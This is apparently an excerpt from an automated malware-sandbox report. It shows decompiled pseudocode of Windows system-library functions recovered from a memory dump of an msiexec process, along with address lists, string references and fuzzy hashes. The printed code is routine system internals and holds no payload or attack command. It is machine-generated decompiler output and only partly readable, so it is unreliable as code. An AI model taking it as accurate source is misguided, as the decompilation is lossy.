                              0x04d0e692
                              0x04d0e69b
                              0x04d0e6a3
                              0x04d0e6ad
                              0x04d0e6b1
                              0x04d0e6b2
                              0x04d0e6bb
                              0x04d0e6bf
                              0x04d0e6c0
                              0x04d0e6c8
                              0x04d0e6cc
                              0x04d0e6d5
                              0x04d0e6d9
                              0x00000000
                              0x00000000
                              0x04d0e6e5
                              0x04d0e6ea
                              0x04d0e6f9
                              0x04d0e70b
                              0x04d0e70f
                              0x04d65439
                              0x04d6545e
                              0x04d6545e
                              0x00000000
                              0x04d6545e
                              0x04d6543b
                              0x04d6543e
                              0x04d65440
                              0x04d65445
                              0x04d65472
                              0x04d65475
                              0x04d6548d
                              0x04d65493
                              0x04d654a9
                              0x00000000
                              0x00000000
                              0x04d654ab
                              0x04d654b4
                              0x04d654bc
                              0x04d654c8
                              0x04d654de
                              0x04d654fb
                              0x04d654e0
                              0x04d654e6
                              0x04d654eb
                              0x04d654eb
                              0x04d654de
                              0x00000000
                              0x04d654bc
                              0x04d65477
                              0x04d6547a
                              0x04d65480
                              0x04d65483
                              0x04d65486
                              0x04d6548b
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d6548b
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d65447
                              0x04d65447
                              0x04d65447
                              0x04d65447
                              0x04d6544e
                              0x00000000
                              0x00000000
                              0x04d65450
                              0x04d65452
                              0x04d65455
                              0x04d6545a
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d6545c
                              0x04d6546a
                              0x04d6546d
                              0x04d6546f
                              0x00000000
                              0x04d6546f
                              0x04d0e70f

                              Strings
                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 04D0E68C
                              • InstallLanguageFallback, xrefs: 04D0E6DB
                              • @, xrefs: 04D0E6C0
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                              • API String ID: 0-1757540487
                              • Opcode ID: 6c2ab011dff54db1b0d1da98b8706e5e745356e90d584a51d88e889b797d8a56
                              • Instruction ID: daa2deb701268b029bb37997c6733dc269f50229a1aef41cdb1ab704fc9378e0
                              • Opcode Fuzzy Hash: 6c2ab011dff54db1b0d1da98b8706e5e745356e90d584a51d88e889b797d8a56
                              • Instruction Fuzzy Hash: 96518DB2608355ABD714DF24E454B6AB3E8BF88714F0449AEF986D7240F734FA4487A2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DCE539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                              Download Yara Rule
                              C-Code - Quality: 60%
                              			E04DCE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E04DCBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E04DCBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E04DCAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E04D49730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E04DCA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E04DCA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E04D49730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E04DCA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E04DCA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E04D22280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E04D1B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E04D1FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E04D27D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E04DBFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                              0x04dce547
                              0x04dce549
                              0x04dce54f
                              0x04dce553
                              0x04dce557
                              0x04dce55a
                              0x04dce55c
                              0x04dce55f
                              0x04dce561
                              0x04dce567
                              0x04dce56b
                              0x04dce7e2
                              0x00000000
                              0x04dce571
                              0x04dce575
                              0x04dce577
                              0x04dce57b
                              0x04dce57c
                              0x04dce57d
                              0x04dce57e
                              0x04dce57f
                              0x04dce588
                              0x04dce58f
                              0x04dce591
                              0x04dce592
                              0x04dce592
                              0x04dce596
                              0x04dce59e
                              0x04dce5a0
                              0x04dce5a6
                              0x04dce61d
                              0x04dce61d
                              0x04dce621
                              0x04dce623
                              0x04dce630
                              0x04dce630
                              0x04dce7e6
                              0x04dce7eb
                              0x04dce7ed
                              0x04dce7f4
                              0x04dce7fa
                              0x04dce7ff
                              0x04dce7ff
                              0x04dce80a
                              0x04dce812
                              0x04dce812
                              0x04dce5ab
                              0x04dce5b4
                              0x04dce5b9
                              0x04dce5be
                              0x04dce5c0
                              0x04dce5c2
                              0x04dce5c8
                              0x04dce5c9
                              0x04dce5cb
                              0x04dce5cc
                              0x04dce5d5
                              0x04dce5e4
                              0x04dce5f1
                              0x04dce5f8
                              0x04dce5f8
                              0x04dce5d5
                              0x04dce602
                              0x04dce616
                              0x04dce63d
                              0x04dce644
                              0x04dce64d
                              0x04dce652
                              0x04dce657
                              0x04dce659
                              0x04dce65b
                              0x04dce661
                              0x04dce662
                              0x04dce664
                              0x04dce665
                              0x04dce66e
                              0x04dce67d
                              0x04dce68a
                              0x04dce691
                              0x04dce691
                              0x04dce66e
                              0x04dce6b0
                              0x00000000
                              0x04dce6b6
                              0x04dce6bd
                              0x04dce6c7
                              0x04dce6d7
                              0x04dce6d9
                              0x04dce6db
                              0x04dce6de
                              0x04dce6e3
                              0x04dce6f3
                              0x04dce6fc
                              0x04dce700
                              0x04dce700
                              0x04dce704
                              0x04dce70a
                              0x04dce70a
                              0x04dce713
                              0x04dce716
                              0x04dce719
                              0x04dce720
                              0x04dce761
                              0x04dce76b
                              0x04dce774
                              0x04dce77a
                              0x04dce77a
                              0x04dce78a
                              0x04dce791
                              0x04dce799
                              0x04dce79b
                              0x04dce79f
                              0x04dce7aa
                              0x04dce7c0
                              0x04dce7ac
                              0x04dce7b2
                              0x04dce7b9
                              0x04dce7b9
                              0x04dce7c7
                              0x04dce806
                              0x00000000
                              0x04dce7c9
                              0x04dce7d1
                              0x04dce7d8
                              0x00000000
                              0x04dce7d8
                              0x00000000
                              0x00000000
                              0x04dce722
                              0x04dce72e
                              0x04dce748
                              0x04dce74c
                              0x04dce754
                              0x04dce756
                              0x04dce75c
                              0x04dce75c
                              0x00000000
                              0x04dce75c
                              0x04dce758
                              0x04dce758
                              0x00000000
                              0x04dce758
                              0x04dce750
                              0x00000000
                              0x00000000
                              0x04dce752
                              0x00000000
                              0x04dce752
                              0x04dce730
                              0x04dce735
                              0x04dce73d
                              0x04dce73f
                              0x00000000
                              0x00000000
                              0x04dce741
                              0x04dce741
                              0x00000000
                              0x04dce741
                              0x04dce739
                              0x00000000
                              0x00000000
                              0x04dce73b
                              0x00000000
                              0x04dce73b
                              0x04dce722
                              0x04dce720
                              0x04dce6b0
                              0x04dce618
                              0x00000000
                              0x04dce618

                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: `$`
                              • API String ID: 0-197956300
                              • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                              • Instruction ID: d886fee3c4fa80402315359cc7290cca2094c8da60f514ce128bc57078968051
                              • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                              • Instruction Fuzzy Hash: 3F9159B13443429BE724CE25C945B2BB7E6BF84714F14892DF999CB280E774F905CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D851BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                              Download Yara Rule
                              C-Code - Quality: 77%
                              			E04D851BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x4de05f0);
				E04D5D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E04D1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E04D853CA(0);
						return E04D5D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E04D4F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E04D23690(1, _t117, 0x4ce1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E04D4AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L04D24620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E04D4AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E04D8500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E04D49860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                              0x04d851be
                              0x04d851c3
                              0x04d851c8
                              0x04d851cd
                              0x04d851d0
                              0x04d851d3
                              0x04d851d8
                              0x04d851db
                              0x04d851de
                              0x04d851e0
                              0x04d851e3
                              0x04d851e6
                              0x04d851e8
                              0x04d85342
                              0x04d85351
                              0x04d85356
                              0x04d8535a
                              0x04d85360
                              0x04d85363
                              0x04d85366
                              0x04d85369
                              0x04d85369
                              0x04d8536b
                              0x04d8536b
                              0x04d85370
                              0x04d853a3
                              0x04d853a4
                              0x04d853a6
                              0x04d853ab
                              0x04d853ab
                              0x04d853ae
                              0x04d853ae
                              0x04d853b5
                              0x04d853bf
                              0x04d853bf
                              0x04d85375
                              0x04d85396
                              0x04d853a0
                              0x04d853a0
                              0x00000000
                              0x04d85396
                              0x04d85377
                              0x04d85379
                              0x04d8537f
                              0x04d8538c
                              0x04d85390
                              0x00000000
                              0x04d85390
                              0x04d851ee
                              0x04d851f1
                              0x04d85301
                              0x04d85310
                              0x04d85315
                              0x04d85318
                              0x04d8531b
                              0x04d85320
                              0x04d8532e
                              0x04d85331
                              0x00000000
                              0x04d85331
                              0x04d85328
                              0x04d85329
                              0x00000000
                              0x04d85329
                              0x04d851fa
                              0x04d85235
                              0x04d85236
                              0x04d85239
                              0x04d8523f
                              0x04d85240
                              0x04d85241
                              0x04d85242
                              0x04d85246
                              0x04d85247
                              0x04d8524e
                              0x04d85251
                              0x04d85267
                              0x04d85269
                              0x04d8526e
                              0x04d8527d
                              0x04d8527e
                              0x04d85281
                              0x04d85282
                              0x04d85287
                              0x04d85288
                              0x04d8528a
                              0x04d8528f
                              0x04d85294
                              0x00000000
                              0x00000000
                              0x04d8529a
                              0x04d8529c
                              0x04d8529e
                              0x04d8529e
                              0x04d852a4
                              0x04d852b0
                              0x00000000
                              0x00000000
                              0x04d852ba
                              0x04d852bc
                              0x04d852bc
                              0x04d852d4
                              0x04d852d9
                              0x04d852dc
                              0x04d852e1
                              0x00000000
                              0x00000000
                              0x04d852e7
                              0x04d852f4
                              0x00000000
                              0x04d852f4
                              0x04d85270
                              0x00000000
                              0x04d85270
                              0x04d851fc
                              0x04d851fd
                              0x04d85202
                              0x04d85203
                              0x04d85205
                              0x04d8520a
                              0x04d8520f
                              0x00000000
                              0x00000000
                              0x04d8521b
                              0x04d85226
                              0x04d8522b
                              0x04d8521d
                              0x04d8521d
                              0x04d85222
                              0x04d85222
                              0x04d8522d
                              0x00000000

                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: Legacy$UEFI
                              • API String ID: 2994545307-634100481
                              • Opcode ID: ac146a67ed419757c216816862543435c3b882981421d9acff6c20d3b633de11
                              • Instruction ID: 968d6ab888203cb54d6ec76d3fc1fc0c081a17bbae8d2595e0daa928c0cc98ac
                              • Opcode Fuzzy Hash: ac146a67ed419757c216816862543435c3b882981421d9acff6c20d3b633de11
                              • Instruction Fuzzy Hash: 7D516DB1A00608AFDB25EFA89950BBDBBF9FB48704F54402DE549EB251DB71E900CB20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D2B944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                              Download Yara Rule
                              C-Code - Quality: 76%
                              			E04D2B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x4dfd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E04D27D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E04DD8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E04D49E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E04D4B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E04D4CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E04D27D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E04DD8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E04D4AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x4df8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x4df862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x4df8628; // 0x0
							_t116 =  *0x4df862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                              0x04d2b94c
                              0x04d2b956
                              0x04d2b95c
                              0x04d2b95e
                              0x04d2b964
                              0x04d2b969
                              0x04d2b96d
                              0x04d2b96d
                              0x04d2b970
                              0x04d2b974
                              0x04d2b97a
                              0x04d2badf
                              0x04d2badf
                              0x04d2bae2
                              0x04d2bae4
                              0x04d2bae6
                              0x04d2baf0
                              0x04d72cb8
                              0x04d2baf6
                              0x04d2baf6
                              0x04d2baf6
                              0x04d2bafd
                              0x04d2bb1f
                              0x04d2bb1f
                              0x04d2baff
                              0x04d2bb00
                              0x04d2bb00
                              0x04d2bb03
                              0x04d2bb03
                              0x04d2bacb
                              0x04d2bacf
                              0x04d2bad0
                              0x04d2bad1
                              0x04d2badc
                              0x04d2badc
                              0x04d2b980
                              0x04d2b980
                              0x04d2b988
                              0x04d2b98b
                              0x04d2b98d
                              0x04d2b990
                              0x04d2b993
                              0x04d2b999
                              0x04d2b99b
                              0x04d2b9a1
                              0x04d2b9a5
                              0x04d2b9aa
                              0x04d2b9b0
                              0x04d2b9bb
                              0x04d2b9c0
                              0x04d2b9c3
                              0x04d2b9ca
                              0x04d2b9cc
                              0x04d2b9cf
                              0x04d2b9d3
                              0x04d2b9d7
                              0x04d2ba94
                              0x04d2ba94
                              0x04d2ba98
                              0x04d2baa3
                              0x04d72ccb
                              0x04d2baa9
                              0x04d2baa9
                              0x04d2baa9
                              0x04d2bab1
                              0x04d72cd5
                              0x04d72cdd
                              0x04d72cdd
                              0x04d2babb
                              0x04d2babc
                              0x04d2bac2
                              0x04d2bac3
                              0x04d2bac3
                              0x04d2bac6
                              0x00000000
                              0x04d2b9dd
                              0x04d2b9dd
                              0x04d2b9e7
                              0x04d2b9e7
                              0x04d2b9ec
                              0x04d2b9ec
                              0x04d2b9f1
                              0x04d2b9f5
                              0x04d2b9fa
                              0x04d2ba00
                              0x04d2ba0c
                              0x04d2ba10
                              0x04d2ba10
                              0x04d2ba12
                              0x04d2ba18
                              0x00000000
                              0x00000000
                              0x04d2bb26
                              0x04d2bb26
                              0x04d2ba1e
                              0x04d2ba1e
                              0x04d2ba23
                              0x04d2ba25
                              0x04d2ba2c
                              0x04d2ba30
                              0x04d2ba35
                              0x04d2ba35
                              0x04d2ba41
                              0x04d2ba46
                              0x04d2ba4c
                              0x04d2ba50
                              0x04d2ba54
                              0x04d2ba6a
                              0x04d2ba6e
                              0x04d2ba70
                              0x04d2ba74
                              0x04d2ba78
                              0x04d2ba7a
                              0x04d2ba7c
                              0x04d2ba8e
                              0x04d2ba90
                              0x04d2ba92
                              0x04d2bb14
                              0x04d2bb14
                              0x04d2bb16
                              0x04d2bb16
                              0x00000000
                              0x04d2ba7c
                              0x04d2bb0a
                              0x04d2bb0d
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d2bb0f

                              APIs
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D2B9A5
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                              • String ID:
                              • API String ID: 885266447-0
